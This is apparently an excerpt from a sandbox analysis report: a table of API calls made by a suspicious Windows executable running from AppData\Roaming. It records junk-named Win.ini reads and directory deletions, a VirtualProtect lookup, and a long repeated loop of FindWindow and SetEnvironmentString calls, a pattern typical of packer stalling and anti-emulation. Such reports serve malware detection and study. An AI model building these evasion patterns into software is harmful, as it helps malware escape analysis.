| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 |
|
1 | |
| Ini | Read Section | file_name_orig = Win.ini, section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = ewè\ÈH |
|
250 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x75c09950 |
|
1 | |
| File | Delete Directory | directory = laxodaromowuku himefuvuriyuseyu zegiyevufebucena sanavazobijayu |
|
249 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75c07a50 |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
